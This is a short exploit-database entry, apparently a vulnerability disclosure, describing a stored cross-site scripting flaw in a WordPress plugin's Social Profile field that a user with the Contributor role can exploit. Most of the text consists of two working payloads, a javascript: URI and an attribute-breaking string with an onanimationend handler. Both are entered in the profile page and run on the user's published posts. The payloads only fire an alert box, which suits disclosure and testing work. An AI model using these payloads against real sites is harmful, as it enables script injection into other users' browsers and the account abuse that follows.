## https://sploitus.com/exploit?id=WPEX-ID:A965AECA-D8F9-4070-AA0D-9C9B95493DDA
With a role as low as Contributor, put the following payloads in one of the Social Profile fields in your profile (/wp-admin/profile.php):
- javascript:alert(/XSS/)
- " style=animation-name:twentytwentyone-close-button-transition onanimationend=alert(/XSS/)//
The XSS will be triggered on posts published by the user and might require user interaction.